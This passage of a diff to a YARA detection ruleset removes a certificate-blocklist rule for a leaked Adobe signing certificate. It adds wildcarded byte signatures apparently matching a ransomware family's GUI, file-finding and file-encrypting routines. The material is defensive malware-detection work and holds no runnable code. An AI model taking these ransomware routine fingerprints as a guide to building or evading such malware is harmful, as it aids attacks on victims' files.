-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "5f:27:36:26:85:9a:e4:bc:4b:ec:bb:eb:71:e2:ab:2d" and 1341792000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_B1Ad46Ce4Db160B348C24F66C9663178 : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "df34eb28-18ec-568b-8257-0b2f7959868c"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1398-L1414"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "59ce2b7a2e881853d07446b3dda74b296f2be09651364d0e131552cf76dab751"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$manage_gui_p1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 57 50
+            6A ?? 6A ?? 6A ?? 6A ?? FF D6 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? 83 F8 ?? 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? FF
+            D6 6A ?? 8B F8 FF D6 8B 75 ?? 99 2B C2 6A ?? D1 F8 68 ?? ?? ?? ?? 2D ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 50 8B C7 99 2B C2 D1 F8 2D ?? ?? ?? ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 6A
+            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 8B E5 5D C2 ?? ??
+            80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
+            F0 83 C4 ?? BF ?? ?? ?? ?? 85 F6 74 ?? 56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 56 E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 4F 50 FF 75 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B F8 57
+            89 7C 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B 35 ?? ?? ?? ?? 50 89 44 24 ?? FF D6 89
+            44 24 ?? 8D 44 24 ?? 50 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? FF 74 24 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
+            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ??
+            ?? ?? ?? 50 57 FF D6 8B 74 24 ?? B8 ?? ?? ?? ?? F7 EE B8 ?? ?? ?? ?? 03 D6 C1 FA ??
+            8B FA C1 EF ?? 03 FA F7 EE 03 D6 C1 FA ?? 8B CA C1 E9 ?? 03 CA 8B D1 C1 E2 ?? 2B D1
+        }
+		$manage_gui_p2 = {
+            C1 E2 ?? 8B CE B8 ?? ?? ?? ?? 2B CA 51 69 CF ?? ?? ?? ?? 2B F1 F7 EE 03 D6 C1 FA ??
+            8B C2 C1 E8 ?? 03 C2 50 57 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 44 24 ?? 6A ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15 ?? ?? ??
+            ?? FF 74 24 ?? 8B 74 24 ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50
+            FF 75 ?? FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
+            F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? 8D 84 24 ?? ?? ?? ?? 57 68 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 83 C4 ?? 8D 51 ?? 0F 1F 40 ?? 8A 01 41 84
+            C0 75 ?? 56 2B CA 8D 84 24 ?? ?? ?? ?? 51 6A ?? 50 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
+            83 C4 ?? 33 C0 5F 5E 8B E5 5D C2 ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 75
+            ?? FF D7 8B 35 ?? ?? ?? ?? 50 FF D6 8B 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 FF D7 50 FF D6
+            8B 75 ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 8D 44 24
+            ?? 50 56 FF 15 ?? ?? ?? ?? 50 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B 3D ?? ??
+            ?? ?? 50 89 44 24 ?? FF D7 8B F0 8D 44 24 ?? 50 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 6A ?? 6A ?? FF 74 24 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF
+            74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 74
+            24 ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 74 24 ?? FF D7 6A
+            ?? 8D 44 24 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 56 8B 74 24
+        }
+		$manage_gui_p3 = {
+            56 FF D7 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 33 C0 5F
+            5E 8B E5 5D C2 ?? ?? 0F B7 45 ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ??
+            83 E8 ?? 0F 84 ?? ?? ?? ?? 2D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 7D ?? 6A ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 6A ?? 8D 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 50 0F 57 C0 C6 44 24 ?? ?? 68 ?? ?? ?? ?? 57 0F 29 44 24
+            ?? 0F 29 44 24 ?? FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA
+            83 F9 ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 5F 5E 8B E5
+            5D C2 ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 50
+            6A ?? 6A ?? 6A ?? 6A ?? FF D6 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 56 6A ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ??
+            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 8B E5 5D C2 ?? ?? 6A ?? FF 75 ?? FF 15 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 8B E5 5D C2 ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0
+            56 FF 15 ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 00 0F 10 05 ?? ?? ?? ?? 0F 11 40 ??
+            F3 0F 7E 05 ?? ?? ?? ?? 66 0F D6 40 ?? 66 8B 0D ?? ?? ?? ?? 66 89 48 ?? 8A 0D ?? ??
+            ?? ?? 88 48 ?? EB ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ??
+            8B F0 56 FF 15 ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 00 0F 10 05 ?? ?? ?? ?? 0F 11
+            40 ?? 66 8B 0D ?? ?? ?? ?? 66 89 48 ?? 8A 0D ?? ?? ?? ?? 88 48 ?? 56 FF 15 ?? ?? ??
+            ?? 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 33 C0 5F 5E 8B E5 5D C2 ?? ?? 3D ?? ?? ?? ?? 75 ?? 81 7D
+        }
+		$find_files_v1_p1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 8B FA 8B D9 89 5D ?? 66 83 FF ?? 75
+            ?? 80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+            E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B CB 89 45 ?? 83 C4 ?? 66 A1 ?? ?? ?? ?? 66 89 45 ??
+            8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 81 F9 ?? ?? ?? ?? 0F 87 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 0F B7 0B 0F B7 95 ?? ??
+            ?? ?? 8B D9 8B F2 8D 41 ?? 0F B7 C0 8D 4A ?? 89 45 ?? 66 83 F9 ?? 8D 46 ?? 0F B7 D0
+            8B C6 8B 35 ?? ?? ?? ?? 0F 47 D0 66 83 7D ?? ?? 8D 43 ?? 0F B7 C8 8B C3 0F 47 C8 66
+            3B D1 0F 85 ?? ?? ?? ?? 66 83 7D ?? ?? 8D 43 ?? 0F B7 C8 8B C3 8B 5D ?? 0F 47 C8 0F
+            B7 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 66 89 0B 68 ?? ?? ?? ?? 50 FF
+            D6 8D 8D ?? ?? ?? ?? 83 C4 ?? 8D 51 ?? 0F 1F 80 ?? ?? ?? ?? 66 8B 01 83 C1 ?? 66 85
+            C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? D1 F9 51 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ??
+            8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? A8
+            ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 5D ?? 53 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D6 83
+            C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 83
+            FE ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 0F 1F 80 ?? ?? ?? ?? 66 8B 01 83
+            C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 81 F9 ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ??
+            ?? 8D 4D ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66
+            3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F
+            84 ?? ?? ?? ?? 8D 4D ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66
+        }
+		$find_files_v1_p2 = {
+            8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 53 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 53
+            66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 66 83
+            FF ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? EB ?? 66 83 FF ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 66 89 85 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 66 83 FF ?? 75 ?? 8D 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 33 F6 66 66 0F 1F 84 00
+            ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 8D 8E ?? ?? ?? ?? 74 ?? 57 6A ?? 6A ?? 51 E8 ?? ??
+            ?? ?? 46 83 C4 ?? 81 FE ?? ?? ?? ?? 7C ?? 57 E8 ?? ?? ?? ?? 8B 75 ?? 83 C4 ?? 56 FF
+            15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_v1_p1 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 51 53 81 EC ?? ?? ?? ?? 53 56 57 89 65
+            ?? 8B F9 89 7D ?? C7 45 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 85 ?? ?? ?? ?? 0F 11 45 ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 0F 13 45 ?? 66 0F 13
+            45 ?? 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 57 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ??
+            8B F7 8D 4E ?? 0F 1F 00 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 83 C6 ?? 89 75
+            ?? C7 45 ?? ?? ?? ?? ?? 33 C9 8B C6 BA ?? ?? ?? ?? F7 E2 0F 90 C1 F7 D9 0B C8 51 E8
+            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 33 C9 66 89 08 57 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
+            ?? ?? ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 8B 75 ?? 56 E8 ?? ??
+            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 56 8D 45 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B CA
+            89 4D ?? 85 C9 0F 8C ?? ?? ?? ?? 7F ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8B F8 89 7D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? BA ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ??
+            6A ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 57 FF 75 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8B C8 89 4D ?? 99 8B F0 89 75 ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? 81
+        }
+		$encrypt_files_v1_p2 = {
+            F9 ?? ?? ?? ?? 7E ?? B9 ?? ?? ?? ?? 8B F7 8D BD ?? ?? ?? ?? F3 A5 8D 45 ?? 50 8D 45
+            ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? FF 75 ?? 8B 7D ?? 57 8B 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 85 ??
+            ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 75 ?? 56 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ??
+            83 C4 ?? EB ?? 51 57 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 45
+            ?? 50 8D 85 ?? ?? ?? ?? 50 56 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
+            75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 03 C6 89 45 ??
+            8B 4D ?? 13 4D ?? 89 4D ?? 3B 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B 45 ?? 0F 82 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? FF 75 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 8B F0 89 75 ?? 56 51 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 6A ?? 57 E8 ?? ?? ?? ?? 6A ?? 8B D7 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 89
+            45 ?? C7 45 ?? ?? ?? ?? ?? 8D 70 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 56 8B D0 8B
+            7D ?? 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 56 8B 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            85 FF 74 ?? 8B CF E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? 8B 75 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 83 E0 ?? 50 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ??
+            ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D 8B E3 5B C3
+        }
+		$find_files_v2_p1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8B C2 8B D9 89 45 ?? 89 5D ?? 56 57 66 83
+            F8 ?? 75 ?? 80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            6A ?? 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B CB 89 45 ?? 83 C4 ?? 66 A1 ?? ?? ?? ?? 66
+            89 45 ?? 8D 51 ?? 66 0F 1F 44 00 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 81
+            F9 ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 0F B7 85 ?? ?? ?? ?? 8B F0 8D 48 ?? 8D 46 ?? 66 83 F9 ?? 0F B7 D0 8B CE 8B C6 0F
+            47 D0 0F B7 03 0F B7 FA 8B D0 83 C0 ?? 0F B7 D8 66 83 F8 ?? 8B C6 76 ?? 0F B7 F0 83
+            FB ?? 8D 42 ?? 0F B7 C8 8B C2 0F 47 C8 66 3B F9 8B 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D7 8B 5D ?? 83 C4 ?? 0F B7
+            03 8B F0 8B C8 83 C1 ?? 66 83 F9 ?? 8D 46 ?? 0F B7 D0 8B C6 0F 47 D0 0F B7 85 ?? ??
+            ?? ?? 8B C8 66 89 13 8D 50 ?? 8D 41 ?? 66 83 FA ?? 0F B7 F0 8B C1 8B CB 0F 47 F0 66
+            89 B5 ?? ?? ?? ?? 8D 51 ?? 0F 1F 00 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 83
+            F9 ?? 76 ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ??
+            EB ?? 8B 5D ?? 53 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D7 83 C4 ?? 8D 85 ?? ?? ??
+            ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B
+            8D ?? ?? ?? ?? 8D 41 ?? 66 83 F8 ?? 77 ?? 8D 41 ?? 0F B7 F8 EB ?? 0F B7 F9 0F B7 03
+        }
+		$find_files_v2_p2 = {
+            8B F0 8B C8 83 C1 ?? 66 83 F9 ?? 8D 46 ?? 0F B7 D0 8B C6 0F 47 D0 66 3B FA 8B 95 ??
+            ?? ?? ?? 75 ?? 83 FA ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 70 ?? 66 8B 08 83 C0
+            ?? 66 85 C9 75 ?? 2B C6 D1 F8 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FA ?? 0F 84 ?? ??
+            ?? ?? 81 FA ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 C2 ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 8D 85
+            ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83
+            C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D
+            4D ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 33 C0 53 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55
+            ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 53 66 89 85 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 66 83 F8
+        }
+		$find_files_v2_p3 = {
+            75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 51 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? EB ?? 66 83 F8 ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 74 ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 66 89 85 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 66 83 F8 ?? 75 ?? 8D 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 33 F6 0F 1F 00
